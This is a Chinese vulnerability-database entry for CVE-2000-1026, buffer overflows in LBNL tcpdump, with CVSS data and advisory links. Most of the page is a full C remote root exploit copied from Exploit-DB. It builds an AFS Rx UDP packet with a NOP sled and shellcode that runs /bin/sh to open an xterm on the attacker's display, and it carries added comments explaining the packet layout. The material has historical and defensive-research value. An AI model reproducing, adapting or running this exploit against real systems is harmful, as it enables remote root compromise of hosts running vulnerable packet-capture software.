CVE-2000-1026
CVSS10.0
发布时间 :2000-12-11 00:00:00
修订时间 :2008-09-05 16:22:28
NMCOE    

[原文]Multiple buffer overflows in LBNL tcpdump allow remote attackers to execute arbitrary commands.


[CNNVD]LBNL tcpdump多个缓冲区溢出漏洞(CNNVD-200012-079)

        LBNL tcpdump存在多个缓冲区溢出漏洞。远程攻击者可以执行任意命令。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:lbl:tcpdump:3.5_alpha
cpe:/a:lbl:tcpdump:3.4a6
cpe:/a:lbl:tcpdump:3.5
cpe:/a:lbl:tcpdump:3.4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1026
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-1026
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200012-079
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1870
(VENDOR_ADVISORY)  BID  1870
http://xforce.iss.net/xforce/xfdb/5480
(UNKNOWN)  XF  tcpdump-afs-packet-overflow(5480)
http://archives.neohapsis.com/archives/linux/suse/2000-q4/0681.html
(UNKNOWN)  SUSE  SuSE-SA:2000:46
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00:61.tcpdump.v1.1.asc
(UNKNOWN)  FREEBSD  FreeBSD-SA-00:61

- 漏洞信息

LBNL tcpdump多个缓冲区溢出漏洞
危急 缓冲区溢出
2000-12-11 00:00:00 2006-11-14 00:00:00
远程  
        LBNL tcpdump存在多个缓冲区溢出漏洞。远程攻击者可以执行任意命令。

- 公告与补丁

        

- 漏洞信息 (20337)

tcpdump 3.4/3.5 AFS ACL Packet Buffer Overflow Vulnerability (EDBID:20337)
unix remote
2001-01-02 Verified
0 Zhodiac
N/A [点击下载]
source: http://www.securityfocus.com/bid/1870/info

tcpdump is a popular network monitoring tool used for watching network traffic written by the Lawrence Berkeley Laboratory. It must at least begin execution as root since it opens and reads from the link layer interface (through pcap). It is usually run directly by/as root. 

tcpdump is vulnerable to a remotely exploitable buffer overflow in its parsing of AFS ACL packets. This is likely the result of the AFS packet fields received over a network interface being copied into memory buffers of predefined length without checks for size. The excessive data could be used to overwrite stack variables if constructed correctly and allow the attacker (who would have sent the custom ACL packets) to gain remote access to the victim host. 

Exploitation of this vulnerability would likely yield root access for the perpetrator.

   /*
    * Tcpdump remote root xploit (3.5.2) (with -s 500 or higher)
    * for Linux x86
    *
    * By: Zhodiac <zhodiac@softhome.net>
    *
    * !Hispahack Research Team
    * http://hispahack.ccc.de
    *
    * This xploit was coded only to prove it can be done :)
    *
    * As usual, this xploit is dedicated to [CrAsH]]
    * She is "the one" and "only one" :***************
    *
    * #include <standar/disclaimer.h>
    *
    * Madrid 2/1/2001
    *
    * Spain r0x
    *
    */

    #include <stdio.h>
    #include <netinet/in.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netdb.h>
    #include <arpa/inet.h>

    /*
     * Tuning constants from the original author. ADDR is an absolute stack
     * address hard-coded for one specific Linux x86 build of tcpdump 3.5.2
     * (see the header comment); it is not discovered at run time and is only
     * shifted by the optional OFFSET argument parsed in main(). NOP is the
     * x86 one-byte no-op; NUM_NOP of them precede the payload in the packet.
     */
    #define ADDR			0xbffff248
    #define OFFSET			0
    #define NUM_ADDR			10	/* copies of the return address written by main() */
    #define NOP				0x90
    #define NUM_NOP			100

    /*
     * Rx/AFS protocol values used to build the datagram: UDP destination
     * port 7000 (fileserver), fixed source port 7001, packet type DATA with
     * the CLIENT_INITIATED flag. The 134 opcode is the AFS call the packet
     * claims to make; its name is taken from the author's macro, nothing in
     * this file verifies it.
     */
    #define RX_CLIENT_INITIATED     1
    #define RX_PACKET_TYPE_DATA     1
    #define FS_RX_DPORT             7000
    #define FS_RX_SPORT             7001
    #define AFS_CALL                134

    /*
     * Rx packet header, laid directly over the start of the send buffer in
     * main(). Its sizeof (28 bytes on common ABIs: five 32-bit words, four
     * bytes, two 16-bit halves, no padding) decides where the payload words
     * begin, so any change here shifts the whole packet layout. Only type,
     * flags and seq are filled in; every other field stays zero from the
     * memset() in main(). Multi-byte fields are written in network order.
     */
    struct rx_header {
        u_int32_t epoch;
        u_int32_t cid;
        u_int32_t callNumber;
        u_int32_t seq;
        u_int32_t serial;
        u_char type;
        u_char flags;
        u_char userStatus;
        u_char securityIndex;
        u_short spare;
        u_short serviceId;
    };

    /*
     * Raw x86 payload supplied by the author (the header comment names
     * Linux x86 as the only target). main() treats it as a C string —
     * strlen()/memcpy() — so it must contain no 0x00 byte, and it patches
     * shellcode[30] at run time with a length derived from argv[2]. The
     * trailing ASCII text is the command template that the payload appends
     * argv[2] to; the meaning of the 'Z' bytes and of the 0xAA..0xDD filler
     * words is not derivable from this file.
     */
    char shellcode[] = /* By Zhodiac <zhodiac@softhome.net> */
      "\xeb\x57\x5e\xb3\x21\xfe\xcb\x88\x5e\x2c\x88\x5e\x23"
      "\x88\x5e\x1f\x31\xdb\x88\x5e\x07\x46\x46\x88\x5e\x08"
      "\x4e\x4e\x88\x5e\xFF\x89\x5e\xfc\x89\x76\xf0\x8d\x5e"
      "\x08\x89\x5e\xf4\x83\xc3\x03\x89\x5e\xf8\x8d\x4e\xf0"
      "\x89\xf3\x8d\x56\xfc\x31\xc0\xb0\x0e\x48\x48\x48\xcd"
      "\x80\x31\xc0\x40\x31\xdb\xcd\x80\xAA\xAA\xAA\xAA\xBB"
      "\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xDD\xDD\xDD\xDD\xe8\xa4"
      "\xff\xff\xff"
      "/bin/shZ-cZ/usr/X11R6/bin/xtermZ-utZ-displayZ";

    /*
     * Convert a dotted-quad string or a host name into an IPv4 address in
     * network byte order. A name that does not resolve terminates the
     * process with exit status -1 after printing a message to stderr.
     *
     * Reviewer notes (behaviour deliberately kept): the in_addr_t returned by
     * inet_addr() is held in a long and compared with -1, so on an LP64
     * target the INADDR_NONE sentinel never matches and gethostbyname() is
     * never reached; memcpy() fills only the low four bytes of the long.
     * exit() and memcpy() are used without <stdlib.h>/<string.h> in this
     * listing, which newer compilers reject as implicit declarations.
     */
    long resolve(char *name) {
     long ip = inet_addr(name);

     if (ip != -1) {
        return ip;                 /* already a numeric address */
     }

     struct hostent *host = gethostbyname(name);
     if (host == NULL) {
        fprintf (stderr,"Can't resolve host name [%s].\n",name);
        exit(-1);
     }
     /* first address of the list, copied as a 32-bit value */
     memcpy(&ip, host->h_addr_list[0], 4);
     return ip;
    }


    /*
     * Entry point: builds a single UDP datagram addressed to port 7000 of
     * argv[1], sent from local port 7001, and transmits it once. argv[2] is
     * the display string embedded in the payload; argv[3] optionally adds an
     * offset to the hard-coded ADDR. Exit status is -1 on any failure, 0
     * after the packet has been sent. Nothing is read back from the network.
     *
     * Reviewer notes on the listing itself (none of these are fixed here):
     *  - atoi(), memset(), sprintf(), strlen(), memcpy(), exit() and close()
     *    are used without <stdlib.h>, <string.h> and <unistd.h>; these are
     *    implicit declarations, rejected by C99-and-later compilers.
     *  - The payload is assembled through a `long int *`, so each word slot
     *    is 4 bytes only on ILP32 targets; on LP64 the htonl() values land
     *    in 8-byte slots and the layout no longer matches the author's
     *    byte counts (the header comment names Linux x86 as the target).
     *  - addr and sin are never zeroed, so sin_zero/padding is passed to
     *    bind() and sendto() uninitialised; sendto() also receives &addr
     *    without the usual (struct sockaddr *) cast.
     *  - argv[2] is copied into buffer[] with no length check, so the tool
     *    can overrun its own stack buffer on an over-long display argument.
     *  - sendto() always sends exactly 520 bytes regardless of how many were
     *    written, so an oversized payload is silently cut off and a short one
     *    is padded with the zeros left by memset().
     *  - fprintf("%#x") is given a long; the format matches only on ILP32.
     */
    int main (int argc, char *argv[]) {

     struct sockaddr_in addr,sin;
     int sock,aux, offset=OFFSET;
     char buffer[4048], *chptr;
     struct rx_header *rxh;
     long int *lptr, return_addr=ADDR;


      fprintf(stderr,"\n!Hispahack Research Team (http://hispahack.ccc.de)\n");
      fprintf(stderr,"Tcpdump 3.5.2 xploit by Zhodiac <zhodiac@softhome.net>\n\n");


      if (argc<3) {
        printf("Usage: %s <host> <display> [offset]\n",argv[0]);
        exit(-1);
        }

      /* optional third argument shifts the hard-coded address; atoi() gives
       * no error indication, so a non-numeric argument silently becomes 0 */
      if (argc==4) offset=atoi(argv[3]);
      return_addr+=offset;

      fprintf(stderr,"Using return addr: %#x\n",return_addr);

      /* destination: the resolved host, AFS fileserver Rx port */
      addr.sin_family=AF_INET;
      addr.sin_addr.s_addr=resolve(argv[1]);
      addr.sin_port=htons(FS_RX_DPORT);

      if ((sock=socket(AF_INET, SOCK_DGRAM,0))<0) {
         perror("socket()");
         exit(-1);
         }

      /* source port is fixed to 7001 — requires the port to be free locally
       * and is a stable observable for anyone inspecting this traffic */
      sin.sin_family=AF_INET;
      sin.sin_addr.s_addr=INADDR_ANY;
      sin.sin_port=htons(FS_RX_SPORT);

      if (bind(sock,(struct sockaddr*)&sin,sizeof(sin))<0) {
          perror("bind()");
          exit(-1);
          }

      /* the Rx header is overlaid on the start of the zeroed buffer; only
       * type, flags and seq are set, every other header field stays 0 */
      memset(buffer,0,sizeof(buffer));
      rxh=(struct rx_header *)buffer;

      rxh->type=RX_PACKET_TYPE_DATA;
      rxh->seq=htonl(1);
      rxh->flags=RX_CLIENT_INITIATED;

      /* call opcode followed by three argument words, directly after the
       * header; each store advances lptr by sizeof(long) */
      lptr=(long int *)(buffer+sizeof(struct rx_header));
      *(lptr++)=htonl(AFS_CALL);
      *(lptr++)=htonl(1);
      *(lptr++)=htonl(2);
      *(lptr++)=htonl(3);

      /* claimed length word (420), then a short text prefix; sprintf() also
       * writes a terminating NUL that the following memset() overwrites */
      *(lptr++)=htonl(420);
      chptr=(char *)lptr;
      sprintf(chptr,"1 0\n");
      chptr+=4;

      /* filler, NUM_ADDR copies of the return address (written in host
       * byte order, not htonl()), NUM_NOP no-op bytes, then the payload */
      memset(chptr,'A',120);
      chptr+=120;
      lptr=(long int *)chptr;
      for (aux=0;aux<NUM_ADDR;aux++) *(lptr++)=return_addr;
      chptr=(char *)lptr;
      memset(chptr,NOP,NUM_NOP);
      chptr+=NUM_NOP;
      /* byte 30 of the payload is overwritten with 46 + strlen(argv[2]);
       * the origin of the constant 46 is not derivable from this file */
      shellcode[30]=(char)(46+strlen(argv[2]));
      memcpy(chptr,shellcode,strlen(shellcode));
      chptr+=strlen(shellcode);
      /* unbounded copy of a command-line argument into the fixed buffer */
      memcpy(chptr,argv[2],strlen(argv[2]));
      chptr+=strlen(argv[2]);

      sprintf(chptr," 1\n");

      /* fixed 520-byte datagram, independent of how much was assembled */
      if (sendto(sock,buffer,520,0,&addr,sizeof(addr))==-1) {
         perror("send()");
         exit(-1);
         }

      fprintf(stderr,"Packet with Overflow sent, now wait for the xterm!!!! :)\n\n");

      close(sock);
      return(0);
     }

   ------- tcpdump-xploit.c ----------		

- 漏洞信息

1624
tcpdump AFS ACL Packet Handling Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2001-10-31 Unknown
2001-10-31 Unknown

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 
